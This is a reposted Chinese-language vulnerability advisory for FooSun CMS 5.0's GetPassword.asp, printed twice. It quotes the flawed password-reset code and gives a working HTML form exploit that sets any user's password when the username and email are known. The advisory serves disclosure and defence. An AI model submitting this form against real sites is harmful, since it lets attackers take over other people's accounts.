上一篇
下一篇
风讯(FooSun)GetPassword.asp任意修改密码漏洞
作者:admin 日期:2010-07-18
影响版本:
FooSun > 5.0漏洞描述:
FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。
在文件\User\ GetPassword.asp中:
ElseIf Request.Form("Action") = "step3" then //第28行
Call step3()
……
Sub step3() //第198行
Dim p_pass_new,p_confim_pass_new
p_pass_new = md5(Request.Form("pass_new"),16)
……
User_Conn.execute("Update FS_ME_Users set UserPassword =''"& NoSqlHack(p_pass_new) &"'' where UserName = ''"& NoSqlHack(StrUserName) &"'' and Email = ''"& NoSqlHack(Replace(Request.Form("Email"),"''''",""))&"''") //第220行
用户可以本地构造表单使程序直接进入修改密码,只需要知道用户名和邮箱。<*参考
Bug.Center.Team
*>
测试方法:
<form id="form1" name="form1" method="post" action="http://www.sitedir.com.cn(测试网站地址)/User/GetPassword.asp">
<input name="Action" type="text" id="Action" value="step3" />
<input name="pass_new" type="text" id="pass_new" value="123456" />
<input name="confim_pass_new" type="text" id="confim_pass_new" value="123456" />
<input name="Email" type="text" id="Email" value="bb@126.com" />
<input name="UserName" type="text" id="UserName" value="bb" />
<input type="submit" name="Submit" value="提交" />
</form>
厂商补丁:
FooSun
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.foosun.net/
文章转载自『非安全中国网』地址: http://www.sitedir.com.cn/exploit-1229.html
FooSun > 5.0漏洞描述:
FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。
在文件\User\ GetPassword.asp中:
ElseIf Request.Form("Action") = "step3" then //第28行
Call step3()
……
Sub step3() //第198行
Dim p_pass_new,p_confim_pass_new
p_pass_new = md5(Request.Form("pass_new"),16)
……
User_Conn.execute("Update FS_ME_Users set UserPassword =''"& NoSqlHack(p_pass_new) &"'' where UserName = ''"& NoSqlHack(StrUserName) &"'' and Email = ''"& NoSqlHack(Replace(Request.Form("Email"),"''''",""))&"''") //第220行
用户可以本地构造表单使程序直接进入修改密码,只需要知道用户名和邮箱。<*参考
Bug.Center.Team
*>
测试方法:
<form id="form1" name="form1" method="post" action="http://www.sitedir.com.cn(测试网站地址)/User/GetPassword.asp">
<input name="Action" type="text" id="Action" value="step3" />
<input name="pass_new" type="text" id="pass_new" value="123456" />
<input name="confim_pass_new" type="text" id="confim_pass_new" value="123456" />
<input name="Email" type="text" id="Email" value="bb@126.com" />
<input name="UserName" type="text" id="UserName" value="bb" />
<input type="submit" name="Submit" value="提交" />
</form>
厂商补丁:
FooSun
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.foosun.net/
文章转载自『非安全中国网』地址: http://www.sitedir.com.cn/exploit-1229.html
文章来自: 
引用通告: 
Tags: 评论: 0 | 引用: 0 | 查看次数: 25
发表评论
